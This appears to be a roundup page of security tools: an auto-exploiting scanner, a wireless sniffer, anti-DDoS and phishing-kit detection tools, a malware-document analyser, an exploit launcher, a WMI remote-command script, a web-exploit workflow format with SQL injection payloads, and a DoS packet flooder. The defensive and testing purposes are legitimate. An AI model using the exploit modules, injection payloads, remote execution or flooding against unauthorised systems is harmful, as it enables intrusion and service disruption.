  • Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
  • Automatically checks for sub-domain hijacking
  • Automatically runs targeted Nmap scripts against open ports
  • Automatically runs targeted Metasploit scan and exploit modules
  • Automatically scans all web applications for common vulnerabilities
  • Automatically brute forces ALL open services
  • Automatically tests for anonymous FTP access
  • Automatically runs WPScan, Arachni and Nikto for all web services
  • Automatically enumerates NFS shares
  • Automatically tests for anonymous LDAP access
  • Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
  • Automatically enumerates SNMP community strings, services and users
  • Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
  • Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
  • Automatically tests for open X11 servers
  • Auto-pwn added for Metasploitable, ShellShock, MS08-067, default Tomcat credentials
  • Performs high-level enumeration of multiple hosts and subnets
  • Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
  • Automatically gathers screenshots of all web sites
  • Creates individual workspaces to store all scan output


Modes

  • REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append ‘report’ to any sniper mode or command.
  • STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
  • DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
  • PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
  • FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
  • WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
  • NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.
  • AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full path of a file containing all hosts/IPs to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
  • NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
  • LOOT: Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type ‘sniper loot’.

There’s a sample report available here.

You can download Sn1per here:

Sn1per-v2.4.zip

Or read more here.


BoopSuite A Wireless Sniffer Tool

This project is easier to use, identifies clients more quickly than airodump-ng, and displays less useless information.

The developer said, “Don’t mistake me, aircrack is an amazing suite of tools and I understand the thought of “why use a different tool when airodump is still very usable”, and the answer is because change is good, and this project is going to continue to grow as I add new handlers for additional packet types.”

Installation:

To install open a terminal and type:

git clone https://github.com/M1ND-B3ND3R/BoopSuite.git
cd BoopSuite
./setup.py

The setup includes creating two symbolic links for the gui and cli version of the tool so it can be run from anywhere.

Upgrade:

To upgrade open a terminal and type:

git clone https://github.com/M1ND-B3ND3R/BoopSuite.git

cd BoopSuite
./setup.py


How to Use?

To start sniffing:
boopsniff -i wlan1mon

To specify a channel:
boopsniff -i wlan1mon -c 6

Boop also works on the 5 GHz band if you have a supporting card:
boopsniff -i wlan1mon -f 5

Reporting can also be enabled:
boopsniff -i wlan1mon -r ~/report.txt

If some processes are interfering then you can preemptively kill them with:
boopsniff -i wlan1mon -k

If you want to see unassociated clients:
boopsniff -i wlan1mon -u

If you want to filter by a specific AP mac address:
boopsniff -i wlan1mon -a xx:xx:xx:xx:xx:xx

New Update includes a gui tool:
boopsniff_gui

Download Boopsuite


Anti-DDoS Solution Based on iptables: nShield


Requirements

  • Linux System with python, iptables
  • Nginx (Will be installed automatically by install.sh)

 

Quickstart

cd /home/ && git clone https://github.com/fnzv/nShield.git && bash nShield/install.sh

This script will replace all your iptables rules so take that into account

 

Usage

The quickstart/installation script above installs python if it is not present and clones the repo with the example config files; it then runs a bash script to set up some settings and a cron job that runs every 30 minutes to check connections against common ipsets. You can find example config files under the examples folder.

Manual HTTPS verification is run with this command from the repository directory:

python nshield-main.py -ssl

After reading the config, the python script will prompt you for an email address (used by Let’s Encrypt) and ask you to publish the DNS TXT record that the DNS-01 challenge requires under your domain. Example:

I Will generate SSL certs for sami.pw with Let's Encrypt DNS challenge
Insert your email address? (Used for cert Expiration and Let's Encrypt TOS agreement
samiii@protonmail.com
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Renewing an existing certificate
Performing the following challenges:
dns-01 challenge for sami.pw

-------------------------------------------------------------------------------
Please deploy a DNS TXT record under the name
_acme-challenge.sami.pw with the following value:

wFyeYk4yl-BERO6pKnMUA5EqwawUri5XnlD2-xjOAUk

Once this is deployed,
-------------------------------------------------------------------------------
Press Enter to Continue
Waiting for verification...
Cleaning up challenges

Your domain is now verified, the certificate is issued and wired into the Nginx configuration, and you can point your A record at this server.


How it works

By default this python script runs every 30 minutes and, based on the config file, performs these operations:

  • Fetches the latest bot, spammer and bad IP/net reputation lists and blocks those sources when they hit your server (thanks to FireHOL, http://iplists.firehol.org/ )
  • Enables basic anti-DDoS methods to deny unwanted/malicious traffic
  • Rate limits when under attack
  • Allows HTTP(S) proxying to protect your site with an external proxy/server (you need to run the SSL verification manually the first time)
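As an added example (not nShield’s own code), here is the list-to-ipset step in Python: it parses a constructed FireHOL-style list, validates and de-duplicates it, warns if any entry would lock out your own admin addresses (some public lists carry RFC1918 ranges, which bites on an internal network), and emits ipset/iptables commands that rebuild the set atomically with ipset swap so there is no window with an empty set. The set name, the admin addresses and the list contents are assumptions.

```python
import ipaddress

# Constructed excerpt in FireHOL .netset/.ipset style (comments, one IP/CIDR per line);
# not a real feed. Note the duplicate, the junk line and the RFC1918 range.
SAMPLE_NETSET = """\
#
# example_badlist  (constructed for this example)
#
198.51.100.0/24
203.0.113.5
203.0.113.5
not-an-ip
10.0.0.0/8
"""

ADMIN_HOSTS = ["10.1.2.3", "192.0.2.10"]   # assumed: addresses you must never lock out


def parse_netset(text):
    """Parse a FireHOL-style list into a sorted, de-duplicated list of networks.
    Bare IPs become /32 (or /128); comments and junk lines are skipped."""
    nets = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        try:
            nets.add(ipaddress.ip_network(line, strict=False))
        except ValueError:
            continue
    return sorted(nets, key=lambda n: (n.version, n))


def self_lockout(nets, admin_hosts):
    """Return (admin_ip, network) pairs where a list entry would block your own access."""
    hits = []
    for host in admin_hosts:
        addr = ipaddress.ip_address(host)
        for n in nets:
            if addr.version == n.version and addr in n:
                hits.append((host, str(n)))
    return hits


def ipset_commands(name, nets):
    """Shell lines that (re)build an ipset and hook it into iptables. The new
    contents are loaded into a scratch set and swapped in, so the live set is
    never empty. Only IPv4 entries are emitted here."""
    tmp = name + "_tmp"
    lines = [
        "ipset create %s hash:net -exist" % name,
        "ipset create %s hash:net -exist" % tmp,
        "ipset flush %s" % tmp,
    ]
    lines += ["ipset add %s %s -exist" % (tmp, n) for n in nets if n.version == 4]
    lines += [
        "ipset swap %s %s" % (tmp, name),
        "ipset destroy %s" % tmp,
        # -C tests for an existing rule so cron re-runs don't stack duplicates
        "iptables -C INPUT -m set --match-set %s src -j DROP 2>/dev/null || "
        "iptables -I INPUT -m set --match-set %s src -j DROP" % (name, name),
    ]
    return lines


def main():
    nets = parse_netset(SAMPLE_NETSET)
    for host, net in self_lockout(nets, ADMIN_HOSTS):
        print("WARNING: %s is inside %s; filter the list before applying it" % (host, net))
    print("\n".join(ipset_commands("nshield_bad", nets)))


if __name__ == "__main__":
    main()
```

Run it as-is to see the generated commands; on a real host, drop the entries that self_lockout reports (or add an explicit ACCEPT for your management range above the DROP rule) before piping the output into a shell.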

 

 

https://github.com/fnzv/nShield


PhishingKitHunter – Find Phishing Kits Which Use Your Brand/Organization’S Files And Image

Find phishing kits which use your brand/organization’s files and images.
PhishingKitHunter (or PKHunter) is a tool for identifying the URLs of phishing kits used in campaigns targeting your customers, where the kit loads some of your own website’s files (CSS, JS, ...). This tool, written in Python 3, is based on analysing the referer of requests that GET particular files on the legitimate website (such as style content) or that redirect the user after the phishing session. The log files (should) contain the referer URL the user came from, which is where the phishing kit is deployed. PhishingKitHunter parses your log file and identifies non-legitimate referers fetching legitimate pages, based on regular expressions you put in PhishingKitHunter’s config file.

Features

  • finds the URL where a phishing kit is deployed
  • checks whether the phishing kit is still up and running
  • generates a JSON report useful for external processing
  • uses a hash of the phishing kit’s page to identify the kit
  • uses a timestamp for history
  • can use an HTTP or SOCKS5 proxy

Usage

$ ./PhishingKitHunter-0.6.py -i LogFile2017.log -o PKHunter-report-20170502-013307.json -c conf/test.conf

  _ \  |  / |   |             |
 |   | ' /  |   | |   | __ \  __|  _ \  __|
 ___/  . \  ___ | |   | |   | |    __/ |
_|    _|\_\_|  _|\__,_|_|  _|\__|\___|_|

-= Phishing Kit Hunter - v0.6b =-

[+] http://badscam.org/includes/ap/?a=2
  |   Timestamp: 01/May/2017:13:00:03
  | HTTP status: can't connect (HTTP Error 404: Not Found)
[+] http://scamme.com/aple/985884e5b60732b1245fdfaf2a49cdfe/
  |   Timestamp: 01/May/2017:13:00:49
  | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
[+] http://badscam-er.com/eb/?e=4
  |   Timestamp: 01/May/2017:13:01:06
  | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
[+] http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/
  |   Timestamp: 01/May/2017:13:01:14
  | HTTP status: UP
  | HTTP shash : 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
[+] http://phish-other.eu/assur/big/phish/2be1c6afdbfc065c410d36ba88e7e4c9/
  |   Timestamp: 01/May/2017:13:01:15
  | HTTP status: UP
  | HTTP shash : 2a545c4d321e3b3cbb34af62e6e6fbfbdbc00a400bf70280cb00f4f6bb0eac44
697475it [06:41, 1208.14it/s]

Help

$ ./PhishingKitHunter-0.6.py --help

  _ \  |  / |   |             |
 |   | ' /  |   | |   | __ \  __|  _ \  __|
 ___/  . \  ___ | |   | |   | |    __/ |
_|    _|\_\_|  _|\__,_|_|  _|\__|\___|_|

-= Phishing Kit Hunter - v0.6b =-

   -h --help   Prints this
   -i --ifile    Input logfile to analyse
   -o --ofile    Output JSON report file (default: ./PKHunter-report-'date'-'hour'.json)
   -c --config   Configuration file to use (default: ./conf/defaults.conf)

JSON report example

$ cat ./PKHunter-report-20170502-013307.json

{
    "PK_URL": "http://badscam.org/includes/ap/?a=2",
    "PK_info": {
        "Domain": "badscam.org",
        "HTTP_sha256": "",
        "HTTP_status": "can't connect (HTTP Error 404: Not Found)",
        "date": "01/May/2017:13:00:03"
    }
}{
    "PK_URL": "http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/",
    "PK_info": {
        "Domain": "assur.cam.tech",
        "HTTP_sha256": "0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091",
        "HTTP_status": "UP",
        "date": "01/May/2017:13:01:14"
    }
}
[...]


Requirements

  • Python 3
  • requests
  • tqdm
  • json
  • PySocks

Install
Install the requirements

pip install -r requirements.txt

Configure
Please read the conf/default.conf file to learn how to configure PhishingKitHunter.



QuickSand.io – Tool For Scanning Streams Within Office Documents Plus Xor DB Attack

QuickSand is a compact C framework to analyze suspected malware documents to 1) identify exploits in streams of different encodings, 2) locate and extract embedded executables. By having the ability to locate embedded obfuscated executables, QuickSand could detect documents that contain zero-day or unknown obfuscated exploits.
File Formats For Exploit and Active Content Detection
  • doc, docx, docm, rtf, etc
  • ppt, pptx, pps, ppsx, etc
  • xls, xlsx, etc
  • mime mso
  • eml email
File Formats For Executable Detection
  • All of the above, plus PDF.
  • Any document format such as HWP.
Lite Version – MPLv2 License
  • Key dictionary up to 256 byte XOR
  • Bitwise ROL, ROR, NOT
  • Addition or subtraction math cipher
  • Executable extraction: Windows, Mac, Linux, VBA
  • Exploit search
  • RTF pre processing
  • Hex stream extract
  • Base 64 Stream extract
  • Embedded Zip extract
  • ExOleObjStgCompressedAtom extract
  • zLib Decode
  • Mime Mso xml Decoding
  • OpenXML decode (unzip)
  • Yara signatures included: Executables, active content, exploits CVE 2014 and earlier
Example results and more info blog post
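An added example, not QuickSand’s code, of the core “locate an obfuscated embedded executable” step in Python: it scans a buffer for a DOS/PE header hidden under a single-byte XOR key or a bit rotation (a subset of the Lite version’s transforms; the 256-byte key dictionary and the math ciphers are left out), and confirms a hit by checking that e_lfanew points at a PE\0\0 signature, which keeps random MZ byte pairs from being reported. The sample document and its header stub are constructed.

```python
import struct

MZ = b"MZ"
PE_SIG = b"PE\x00\x00"


def xor_decode(buf, key):
    return bytes(b ^ key for b in buf)


def ror8(b, n):
    """Rotate an 8-bit value right by n (1..7) bits."""
    return ((b >> n) | (b << (8 - n))) & 0xFF


def ror_decode(buf, n):
    return bytes(ror8(b, n) for b in buf)


def looks_like_pe(decoded):
    """Cheap structural check: 'MZ' at 0 and 'PE\\0\\0' at e_lfanew (dword at 0x3C)."""
    if len(decoded) < 0x40 or decoded[:2] != MZ:
        return False
    e_lfanew = struct.unpack_from("<I", decoded, 0x3C)[0]
    if e_lfanew < 0x40 or e_lfanew + 4 > len(decoded):
        return False
    return decoded[e_lfanew:e_lfanew + 4] == PE_SIG


def find_obfuscated_pe(data, max_header=0x400):
    """Scan `data` for an MZ/PE header hidden by a 1-byte XOR or a bit rotation.
    Returns (offset, transform, key) for the first hit, or None."""
    for i in range(len(data) - 1):
        # XOR: the first byte fixes the key, so there is one candidate per offset
        key = data[i] ^ MZ[0]
        if data[i + 1] ^ key == MZ[1]:
            if looks_like_pe(xor_decode(data[i:i + max_header], key)):
                return (i, "plain" if key == 0 else "xor", key)
        # Rotation: try the 7 non-trivial amounts (ROL n encodes as ROR n decodes)
        for n in range(1, 8):
            if ror8(data[i], n) == MZ[0] and ror8(data[i + 1], n) == MZ[1]:
                if looks_like_pe(ror_decode(data[i:i + max_header], n)):
                    return (i, "ror", n)
    return None


def fake_pe_header():
    """A minimal, constructed DOS+PE header stub (not a real executable)."""
    hdr = bytearray(0x80)
    hdr[0:2] = MZ
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew -> 0x40
    hdr[0x40:0x44] = PE_SIG
    return bytes(hdr)


# Constructed "document": filler with an XOR-0x5A-obfuscated PE header at offset 200
SAMPLE_DOC = b"A" * 200 + xor_decode(fake_pe_header(), 0x5A) + b"A" * 100

if __name__ == "__main__":
    print(find_obfuscated_pe(SAMPLE_DOC))
```

The e_lfanew cross-check is what makes a 1-byte brute force usable: without it, any two adjacent bytes decode to “MZ” under some XOR key, and the scanner would flag almost every offset. Once a hit is found, the same transform applied to the rest of the buffer recovers the executable for extraction.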
Full Version – Commercial License
  • Key cryptanalysis 1-1024 bytes factors of 2; or a specified odd size 1-1024 bytes
  • 1 Byte zerospace not replaced brute force XOR search
  • XOR Look Ahead cipher
  • More Yara signatures included: All lite plus most recent exploits 2014-2016 for CVE identification
  • Try the full version online at QuickSand.io
Dependencies (not included)
  • Yara 3.4+
  • zlib 1.2.1+
  • libzip 1.1.1+


Distributed components under their own licensing
  • MD5 by RSA Data Security, Inc.
  • SHA1 by Paul E. Jones
  • SHA2 by Aaron D. Gifford
  • jWrite by TonyWilk for json output
  • tinydir by Cong Xu, Baudouin Feildel for directory processing
Quick Start
  • ./build.sh
  • ./quicksand.out -h
  • ./quicksand.out malware.doc
Documentation

 


massExpConsole – Collection of Tools and Exploits with a CLI UI


Collection of Tools and Exploits with a CLI UI

What does it do?

  • an easy-to-use user interface (cli)
  • execute any adapted exploit with process-level concurrency
  • crawler for baidu and zoomeye
  • a simple webshell manager
  • some built-in exploits (automated)
  • more to come…

Requirements

  • GNU/Linux or MacOS, WSL (Windows Subsystem Linux), fully tested under Kali Linux (Rolling, 2017), Ubuntu Linux (16.04 LTS) and Fedora 25 (it will work on other distros too as long as you have dealt with all deps)
  • proxychains4 (in $PATH), used by exploiter, requires a working socks5 proxy (you can modify its config in mec.py)
  • Java is required when using Java deserialization exploits, you might want to install openjdk-8-jre if you haven’t installed it yet
  • python packages (not complete, as some third-party scripts might need other deps as well):
    • requests
    • bs4
    • beautifulsoup4
    • html5lib
    • docopt
    • pip3 install on the go
  • note that you have to install all the deps of your exploits or tools as well


Usage

  • just run mec.py, if it complains about missing modules, install them
  • if you want to add your own exploit script (or binary file, whatever):
    • cd exploits, mkdir <yourExploitDir>
    • your exploit should take the last argument passed to it as its target, dig into mec.py to know more
    • chmod 755 <exploitBin> to make sure it can be executed by current user
    • use attack command then m to select your custom exploit
  • type help in the console to see all available features

 


WMI Command Shell Wrapper: WMIcmd


When doing low impact investigations and other similar activities you may want to minimize what is written to disk / obvious. This tool allows us to execute commands via WMI and get information not otherwise available via this channel.

 

Purpose

A small utility which only uses WMI to

  • execute command shell commands
  • capture stdout from these commands and write to the registry
  • read and then delete from the registry
  • print to local stdout

 

Design

The tool is composed of:

  • a very small subset of the NCC Group internal core library (WMICore)
  • command execution (WMIcmd)

 

Usage

C:\Data\NCC\!Code\Git.Public\WMIcmd\WMIcmd\bin\Debug>WMIcmd.exe --help
NCC Group WMIcmd 1.0.0.0
Released under AGPL

  -h, --host            Host (IP address or hostname - default: localhost)

  -u, --username        Username to authenticate with

  -p, --password        Password to authenticate with

  -d, --domain          Domain to authenticate with

  -v, --Verbose         (Default: False) Prints all messages to standard
                        output.

  -c, --Command         (Default: ) Command to run e.g. "nestat-ano"

  -s, --CommandSleep    (Default: 10000) Command sleep in milliseconds -
                        increase if getting truncated output

  --help                Display this help screen.


Example – a non domain joined machine

Note: use administrative credentials

WMIcmd.exe -h 192.168.1.165 -d hostname -u localadmin -p theirpassword -c "netstat -an"

 

Example – domain joined machine

Note: use administrative credentials

WMIcmd.exe -h 192.168.1.165 -d domain -u domainadmin -p theirpassword -c "netstat -an"

 

Example expected output

Note: use administrative credentials

C:\Data\NCC\!Code\Git.Public\WMIcmd\WMIcmd\bin\Debug>WMIcmd.exe -d win10host -h win10host -u superuser -p password -c "netstat -an"
[!] Connecting with superuser
[i] Connecting to win10host
[i] Connected
[i] Command: netstat -an
[i] Running command...
[i] Getting stdout from registry from SOFTWARE\
[i] Full command output received
Active Connections
Proto  Local Address          Foreign Address        State
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING
TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING
TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING
TCP    0.0.0.0:18800          0.0.0.0:0              LISTENING
TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49713          0.0.0.0:0              LISTENING
.. snip .
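The same four steps (execute, capture to the registry, read and delete, print) as an added PowerShell example; this is not NCC Group’s WMIcmd code and does not reproduce its internals. It runs the command through Win32_Process.Create, has the target stash combined stdout/stderr in a registry value, and reads it back with StdRegProv. The scratch key path, the value name and the use of powershell.exe on the target are assumptions; commands containing quotes need extra escaping inside the here-string.

```powershell
# Added example, not WMIcmd itself. Assumed: HKLM\SOFTWARE\WmiCmdExample is a
# scratch key we may create, and the target can run powershell.exe.
param(
    [Parameter(Mandatory)] [string] $ComputerName,
    [Parameter(Mandatory)] [pscredential] $Credential,   # administrative account
    [Parameter(Mandatory)] [string] $Command,             # e.g. 'netstat -an'
    [int] $TimeoutSeconds = 60
)

$HKLM   = [uint32]2147483650          # HKEY_LOCAL_MACHINE for StdRegProv
$SubKey = 'SOFTWARE\WmiCmdExample'    # assumed scratch key
$Value  = 'out'

# Script the target runs: capture stdout+stderr as one string, then store it in
# one write, so the reader never sees a half-written value.
$remote = @"
New-Item -Path 'HKLM:\$SubKey' -Force | Out-Null
`$o = cmd.exe /c $Command 2>&1 | Out-String
Set-ItemProperty -Path 'HKLM:\$SubKey' -Name '$Value' -Value `$o
"@
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($remote))
$cmdline = "powershell.exe -NoProfile -NonInteractive -EncodedCommand $encoded"

$wmi = @{ ComputerName = $ComputerName; Credential = $Credential }

# 1. Execute via WMI. The child is spawned by WmiPrvSE.exe, which is what
#    4688 / Sysmon event 1 parent-process rules key on.
$r = Invoke-WmiMethod @wmi -Class Win32_Process -Name Create -ArgumentList $cmdline
if ($r.ReturnValue -ne 0) { throw "Win32_Process.Create failed: $($r.ReturnValue)" }

# 2. Poll for the value instead of a fixed sleep (WMIcmd's -s); the value only
#    appears once the command has finished, so output is never truncated.
$deadline = (Get-Date).AddSeconds($TimeoutSeconds)
do {
    Start-Sleep -Milliseconds 500
    $res = Invoke-WmiMethod @wmi -Namespace root\default -Class StdRegProv `
           -Name GetStringValue -ArgumentList $HKLM, $SubKey, $Value
} until ($res.ReturnValue -eq 0 -or (Get-Date) -gt $deadline)
if ($res.ReturnValue -ne 0) { throw "timed out waiting for command output" }

# 3. Print the captured output
$res.sValue

# 4. Remove the value and the scratch key
Invoke-WmiMethod @wmi -Namespace root\default -Class StdRegProv -Name DeleteValue `
    -ArgumentList $HKLM, $SubKey, $Value | Out-Null
Invoke-WmiMethod @wmi -Namespace root\default -Class StdRegProv -Name DeleteKey `
    -ArgumentList $HKLM, $SubKey | Out-Null
```

Invoke-WmiMethod passes -ArgumentList in alphabetical order of the method’s parameter names, which for GetStringValue, DeleteValue and DeleteKey (hDefKey, sSubKeyName, sValueName) happens to match the natural order; check this before adapting the call to other StdRegProv methods. Nothing touches the file system, but the registry write and the WmiPrvSE-spawned process are both visible to a host with process auditing or Sysmon enabled.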

 

https://github.com/nccgroup/WMIcmd


explo – Human And Machine Readable Web Vulnerability Testing Format

explo is a simple tool to describe web security issues in a human and machine readable format. By defining a request/condition workflow, explo is able to exploit security issues without the need to write a script. This makes it possible to share complex vulnerabilities in a simple, readable and executable format.

Example for extracting a csrf token and using this in a form:
name: get_csrf
description: extract csrf token
module: http
parameter:
    url: http://example.com/contact
    method: GET
    header:
        user-agent: Mozilla/5.0
    extract:
        csrf: [CSS, "#csrf"]
---
name: exploit
description: exploits sql injection vulnerability with valid csrf token
module: http
parameter:
    url: http://example.com/contact
    method: POST
    body:
        csrf: "{{get_csrf.extracted.csrf}}"
        username: "' SQL INJECTION"
    find: You have an error in your SQL syntax

In this example definition file the security issue is tested by executing two steps, run from top to bottom. The last step returns success or failure depending on whether the string ‘You have an error in your SQL syntax’ is found in the response.
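To make the step and reference mechanics concrete, here is an added example, not explo’s own code, that runs the two steps above against constructed responses (no network is used): REGEX extraction into get_csrf.extracted.csrf, template substitution in the second step’s body, and the find check that decides success and stops the workflow on failure. CSS extraction is left out to avoid an HTML parser dependency, and the steps are written as Python dicts rather than YAML for the same reason.

```python
import re

# Constructed responses standing in for the two HTTP exchanges in the example;
# keyed by (method, url). The real http module issues the requests.
FAKE_RESPONSES = {
    ("GET", "http://example.com/contact"):
        '<form><input type="hidden" name="csrf" value="t0k3n-123"></form>',
    ("POST", "http://example.com/contact"):
        "Warning: You have an error in your SQL syntax; check the manual",
}

# The two steps from the YAML above, as dicts (REGEX extraction instead of CSS)
STEPS = [
    {"name": "get_csrf", "module": "http", "parameter": {
        "url": "http://example.com/contact", "method": "GET",
        "extract": {"csrf": ["REGEX", r'name="csrf" value="(?P<extract>[^"]*)"']}}},
    {"name": "exploit", "module": "http", "parameter": {
        "url": "http://example.com/contact", "method": "POST",
        "body": {"csrf": "{{get_csrf.extracted.csrf}}", "username": "' SQL INJECTION"},
        "find": "You have an error in your SQL syntax"}},
]

REF_RE = re.compile(r"\{\{\s*([\w.]+)\s*\}\}")


def render(value, context):
    """Replace {{step.extracted.var}} style references with values from earlier steps."""
    def lookup(m):
        node = context
        for part in m.group(1).split("."):
            node = node[part]          # KeyError: reference to a step that never ran
        return str(node)
    return REF_RE.sub(lookup, value)


def run_http_step(step, context, transport):
    """Run one http step. Returns (ok, data) where data is what later steps may reference."""
    p = step["parameter"]
    body = {k: render(v, context) for k, v in p.get("body", {}).items()}
    content = transport(p["method"], render(p["url"], context), body)
    extracted = {}
    for var, (kind, expr) in p.get("extract", {}).items():
        if kind != "REGEX":
            raise ValueError("only REGEX extraction is implemented in this example")
        m = re.search(expr, content)
        if not m:                      # nothing to extract counts as a failed step
            return False, {"response": {"content": content}, "extracted": {}}
        extracted[var] = m.group("extract")
    ok = True
    if "find" in p:
        ok = p["find"] in content
    if "find_regex" in p:
        ok = ok and re.search(p["find_regex"], content) is not None
    return ok, {"response": {"content": content}, "extracted": extracted, "sent_body": body}


def run_workflow(steps, transport):
    """Run steps top to bottom; the first failing step stops the workflow."""
    context = {}
    for step in steps:
        ok, data = run_http_step(step, context, transport)
        context[step["name"]] = data
        if not ok:
            return False, context
    return True, context


def fake_transport(method, url, body):
    """Stand-in for the HTTP client: look the constructed response up by (method, url)."""
    return FAKE_RESPONSES[(method, url)]


if __name__ == "__main__":
    success, ctx = run_workflow(STEPS, fake_transport)
    print("success" if success else "failure", ctx["exploit"]["sent_body"])
```

Swapping fake_transport for a function built on requests turns this into a working runner for the http module subset shown; the point of the example is that every value a later step can reference (response.content, extracted.*) is just what the earlier step returned into the shared context.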

Installation

Install via PyPI

pip install explo

Install via source

git clone https://github.com/dtag-dev-sec/explo
cd explo
python setup.py install

Usage

explo [--verbose|-v] testcase.yaml
explo [--verbose|-v] examples/*.yaml

There are a few example testcases in the examples/ folder.

$ explo examples/SQLI_simple_testphp.vulnweb.com.yaml

You can also include explo as a python lib:

from explo.core import from_content as explo_from_content
from explo.core import ExploException, ProxyException

def save_log(msg):
    print(msg)

# Read the YAML testcase and hand its content to explo; save_log receives the log messages
with open('testcase.yaml') as fh:
    explo_yaml_content = fh.read()

try:
    result = explo_from_content(explo_yaml_content, save_log)
except (ExploException, ProxyException) as err:
    print(err)

Modules
Modules can be added to improve functionality and classes of security issues.

http (basic)
The http module makes an HTTP request, extracts content and searches/verifies content.
The following data is made available to subsequent steps:

  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies
  • extracted content: stepname.extracted.variable_name

If a find_regex parameter is set, a regular expression match is executed on the response body. If it fails, the module returns a failure and stops the execution of the current workflow (and all remaining steps).
When extracting by regular expression, use the match group named extract to mark the value to extract (see the example below).
For cookies, reference the name of the previous step whose cookies should be used (cookies: the_other_step.response.cookies).
Parameter examples:

parameter:
    url: http://example.com
    method: GET
    allow_redirects: True
    headers:
        User-Agent: explo
        Content-Type: abc
    cookies: stepname.response.cookies
    body:
        key: value
    find: search for string
    find_regex: search for (reg|ular)expression
    find_in_headers: searchstring in headers
    extract:
        variable1: [CSS, '#csrf']
        variable2: [REGEX, '<input(.*?)value="(?P<extract>.*?)"']

http_header
The http header module allows to check if a response misses a specified set of headers (and values). All other parameters are identical to the http module.
The following data is made available for other modules:

  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies

Parameter examples:

parameter:
    url: http://example.com
    method: GET
    allow_redirects: True
    headers:
        User-Agent: explo
        Content-Type: abc
    body:
        key: value
    headers_required:
        X-XSS-Protection: 1
        Server: .               # all values are valid


sqli_blind
The sqli_blind module is able to identify time based blind sql injections.
The following data is made available for other modules:

  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies

Parameter examples:

parameter:
    url: http://example.com/vulnerable.php?id=1' waitfor delay '00:00:5'--
    method: GET
    delay_seconds: 5

If the threshold of 5 seconds (delay_seconds) is exceeded, the check returns true (and thus resulting in a success).


T50: Very Fast Network Packet Injector Tool


T50 (codename Sukhoi PAK FA) is a multi-protocol network packet injector that its project describes as the fastest available.

It was written by the Brazilian researcher Nelson Brito for stress testing: it can simulate DoS and DDoS attacks by generating packets far faster than a target can process them, so the target slows down or stops responding.
The project reports the following rates:
  • More than 1,000,000 packets per second of SYN flood, i.e. over 50% of the uplink of a 1000BASE-T (Gigabit Ethernet) network.
  • More than 120,000 packets per second of SYN flood, i.e. over 60% of the uplink of a 100BASE-TX (Fast Ethernet) network.
T50 can also send ICMP, IGMP, UDP and TCP packets in sequence with microsecond spacing between them.


License:

GNU General Public License version 2.0 (GPLv2)

Features:
  • Supports many network protocols, including TCP, UDP and ICMP
  • Exceeds 1,000,000 pps on gigabit networks
  • Can simulate DoS and DDoS attacks

DOWNLOAD HERE

